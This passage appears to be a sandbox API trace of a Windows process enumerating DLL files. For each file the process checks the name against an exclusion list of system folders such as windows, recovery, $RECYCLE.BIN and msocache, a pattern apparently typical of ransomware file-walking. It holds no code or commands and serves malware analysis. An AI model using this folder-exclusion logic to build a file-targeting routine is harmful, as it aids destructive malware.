(lpString1="Microsoft.Mashup.OAuth.dll", lpString2=".") returned 1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OAuth.dll", lpString2="..") returned 1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OAuth.dll", lpString2="...") returned 1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OAuth.dll", lpString2="windows") returned -1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OAuth.dll", lpString2="recovery") returned -1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OAuth.dll", lpString2="perflogs") returned -1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OAuth.dll", lpString2="documents and settings") returned 1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OAuth.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OAuth.dll", lpString2="system volume information") returned -1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OAuth.dll", lpString2="msocache") returned -1 [0123.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0123.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.OAuth.dll", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0123.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0123.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.OAuth.dll", cchWideChar=26, lpMultiByteStr=0x240f48, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.OAuth.dll", lpUsedDefaultChar=0x0) returned 26 [0123.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0123.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.OAuth.dll", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0123.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0123.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.OAuth.dll", cchWideChar=26, lpMultiByteStr=0x241290, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.OAuth.dll", lpUsedDefaultChar=0x0) returned 26 [0123.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e570 [0123.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244708 | out: hHeap=0x1e0000) returned 1 [0123.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0123.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0123.247] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4704e3d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4704e3d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf472b09c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x9040, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Mashup.OleDbInterop.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbInterop.dll", lpString2=".") returned 1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbInterop.dll", lpString2="..") returned 1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbInterop.dll", lpString2="...") returned 1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbInterop.dll", lpString2="windows") returned -1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbInterop.dll", lpString2="recovery") returned -1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbInterop.dll", lpString2="perflogs") returned -1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbInterop.dll", lpString2="documents and settings") returned 1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbInterop.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.247] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbInterop.dll", lpString2="system volume information") returned -1 [0123.248] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbInterop.dll", lpString2="msocache") returned -1 [0123.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0123.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.OleDbInterop.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0123.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.OleDbInterop.dll", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.OleDbInterop.dll", lpUsedDefaultChar=0x0) returned 33 [0123.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0123.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0123.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.OleDbInterop.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0123.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.OleDbInterop.dll", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.OleDbInterop.dll", lpUsedDefaultChar=0x0) returned 33 [0123.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0123.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e688 [0123.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0123.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.248] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd42039, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd42039, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13240, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Mashup.OleDbProvider.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.248] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbProvider.dll", lpString2=".") returned 1 [0123.248] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbProvider.dll", lpString2="..") returned 1 [0123.248] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbProvider.dll", lpString2="...") returned 1 [0123.248] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbProvider.dll", lpString2="windows") returned -1 [0123.248] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbProvider.dll", lpString2="recovery") returned -1 [0123.248] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbProvider.dll", lpString2="perflogs") returned -1 [0123.248] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbProvider.dll", lpString2="documents and settings") returned 1 [0123.248] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbProvider.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.248] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbProvider.dll", lpString2="system volume information") returned -1 [0123.248] lstrcmpiW (lpString1="Microsoft.Mashup.OleDbProvider.dll", lpString2="msocache") returned -1 [0123.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0123.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.OleDbProvider.dll", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0123.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.OleDbProvider.dll", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.OleDbProvider.dll", lpUsedDefaultChar=0x0) returned 34 [0123.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0123.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0123.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.OleDbProvider.dll", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0123.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.OleDbProvider.dll", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.OleDbProvider.dll", lpUsedDefaultChar=0x0) returned 34 [0123.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0123.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0123.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0123.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.249] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6ea9118, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6ea9118, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7642a1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x23f640, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Mashup.ScriptDom.dll", cAlternateFileName="MIC995~1.DLL")) returned 1 [0123.249] lstrcmpiW (lpString1="Microsoft.Mashup.ScriptDom.dll", lpString2=".") returned 1 [0123.249] lstrcmpiW (lpString1="Microsoft.Mashup.ScriptDom.dll", lpString2="..") returned 1 [0123.249] lstrcmpiW (lpString1="Microsoft.Mashup.ScriptDom.dll", lpString2="...") returned 1 [0123.249] lstrcmpiW (lpString1="Microsoft.Mashup.ScriptDom.dll", lpString2="windows") returned -1 [0123.249] lstrcmpiW (lpString1="Microsoft.Mashup.ScriptDom.dll", lpString2="recovery") returned -1 [0123.249] lstrcmpiW (lpString1="Microsoft.Mashup.ScriptDom.dll", lpString2="perflogs") returned -1 [0123.249] lstrcmpiW (lpString1="Microsoft.Mashup.ScriptDom.dll", lpString2="documents and settings") returned 1 [0123.249] lstrcmpiW (lpString1="Microsoft.Mashup.ScriptDom.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.249] lstrcmpiW (lpString1="Microsoft.Mashup.ScriptDom.dll", lpString2="system volume information") returned -1 [0123.249] lstrcmpiW (lpString1="Microsoft.Mashup.ScriptDom.dll", lpString2="msocache") returned -1 [0123.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0123.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.ScriptDom.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0123.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.ScriptDom.dll", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.ScriptDom.dll", lpUsedDefaultChar=0x0) returned 30 [0123.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0123.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.ScriptDom.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0123.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0123.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.ScriptDom.dll", cchWideChar=30, lpMultiByteStr=0x240f48, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.ScriptDom.dll", lpUsedDefaultChar=0x0) returned 30 [0123.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e8b8 [0123.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0123.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0123.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.268] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbda21cf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbda21cf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbdc8437, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x20aa8, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Mashup.Storage.XmlSerializers.dll", cAlternateFileName="MID814~1.DLL")) returned 1 [0123.268] lstrcmpiW (lpString1="Microsoft.Mashup.Storage.XmlSerializers.dll", lpString2=".") returned 1 [0123.268] lstrcmpiW (lpString1="Microsoft.Mashup.Storage.XmlSerializers.dll", lpString2="..") returned 1 [0123.268] lstrcmpiW (lpString1="Microsoft.Mashup.Storage.XmlSerializers.dll", lpString2="...") returned 1 [0123.268] lstrcmpiW (lpString1="Microsoft.Mashup.Storage.XmlSerializers.dll", lpString2="windows") returned -1 [0123.268] lstrcmpiW (lpString1="Microsoft.Mashup.Storage.XmlSerializers.dll", lpString2="recovery") returned -1 [0123.268] lstrcmpiW (lpString1="Microsoft.Mashup.Storage.XmlSerializers.dll", lpString2="perflogs") returned -1 [0123.268] lstrcmpiW (lpString1="Microsoft.Mashup.Storage.XmlSerializers.dll", lpString2="documents and settings") returned 1 [0123.268] lstrcmpiW (lpString1="Microsoft.Mashup.Storage.XmlSerializers.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.268] lstrcmpiW (lpString1="Microsoft.Mashup.Storage.XmlSerializers.dll", lpString2="system volume information") returned -1 [0123.268] lstrcmpiW (lpString1="Microsoft.Mashup.Storage.XmlSerializers.dll", lpString2="msocache") returned -1 [0123.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0123.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Storage.XmlSerializers.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Storage.XmlSerializers.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Storage.XmlSerializers.dll", lpUsedDefaultChar=0x0) returned 43 [0123.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0123.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0123.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Storage.XmlSerializers.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Storage.XmlSerializers.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Storage.XmlSerializers.dll", lpUsedDefaultChar=0x0) returned 43 [0123.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0123.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0123.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0123.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.268] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3760836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3760836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37869c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x481440, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.MashupEngine.dll", cAlternateFileName="MIE629~1.DLL")) returned 1 [0123.268] lstrcmpiW (lpString1="Microsoft.MashupEngine.dll", lpString2=".") returned 1 [0123.268] lstrcmpiW (lpString1="Microsoft.MashupEngine.dll", lpString2="..") returned 1 [0123.268] lstrcmpiW (lpString1="Microsoft.MashupEngine.dll", lpString2="...") returned 1 [0123.268] lstrcmpiW (lpString1="Microsoft.MashupEngine.dll", lpString2="windows") returned -1 [0123.269] lstrcmpiW (lpString1="Microsoft.MashupEngine.dll", lpString2="recovery") returned -1 [0123.269] lstrcmpiW (lpString1="Microsoft.MashupEngine.dll", lpString2="perflogs") returned -1 [0123.269] lstrcmpiW (lpString1="Microsoft.MashupEngine.dll", lpString2="documents and settings") returned 1 [0123.269] lstrcmpiW (lpString1="Microsoft.MashupEngine.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.269] lstrcmpiW (lpString1="Microsoft.MashupEngine.dll", lpString2="system volume information") returned -1 [0123.269] lstrcmpiW (lpString1="Microsoft.MashupEngine.dll", lpString2="msocache") returned -1 [0123.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0123.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.dll", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0123.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.dll", cchWideChar=26, lpMultiByteStr=0x2410d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.dll", lpUsedDefaultChar=0x0) returned 26 [0123.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0123.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.dll", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0123.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0123.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.dll", cchWideChar=26, lpMultiByteStr=0x240fe8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.dll", lpUsedDefaultChar=0x0) returned 26 [0123.269] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x73ee48, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x73ee48, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x73ee48, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14dac0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.OData.Core.NetFX35.dll", cAlternateFileName="MIDAD6~1.DLL")) returned 1 [0123.269] lstrcmpiW (lpString1="Microsoft.OData.Core.NetFX35.dll", lpString2=".") returned 1 [0123.269] lstrcmpiW (lpString1="Microsoft.OData.Core.NetFX35.dll", lpString2="..") returned 1 [0123.269] lstrcmpiW (lpString1="Microsoft.OData.Core.NetFX35.dll", lpString2="...") returned 1 [0123.269] lstrcmpiW (lpString1="Microsoft.OData.Core.NetFX35.dll", lpString2="windows") returned -1 [0123.269] lstrcmpiW (lpString1="Microsoft.OData.Core.NetFX35.dll", lpString2="recovery") returned -1 [0123.269] lstrcmpiW (lpString1="Microsoft.OData.Core.NetFX35.dll", lpString2="perflogs") returned -1 [0123.269] lstrcmpiW (lpString1="Microsoft.OData.Core.NetFX35.dll", lpString2="documents and settings") returned 1 [0123.269] lstrcmpiW (lpString1="Microsoft.OData.Core.NetFX35.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.269] lstrcmpiW (lpString1="Microsoft.OData.Core.NetFX35.dll", lpString2="system volume information") returned -1 [0123.269] lstrcmpiW (lpString1="Microsoft.OData.Core.NetFX35.dll", lpString2="msocache") returned -1 [0123.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.OData.Core.NetFX35.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0123.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.OData.Core.NetFX35.dll", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.OData.Core.NetFX35.dll", lpUsedDefaultChar=0x0) returned 32 [0123.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.OData.Core.NetFX35.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0123.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.OData.Core.NetFX35.dll", cchWideChar=32, lpMultiByteStr=0x22d298, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.OData.Core.NetFX35.dll", lpUsedDefaultChar=0x0) returned 32 [0123.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0123.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e7a0 [0123.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0123.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.270] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x48f5cfa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x48f5cfa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48f5cfa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb8058, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.OData.Edm.NetFX35.dll", cAlternateFileName="MIF00B~1.DLL")) returned 1 [0123.270] lstrcmpiW 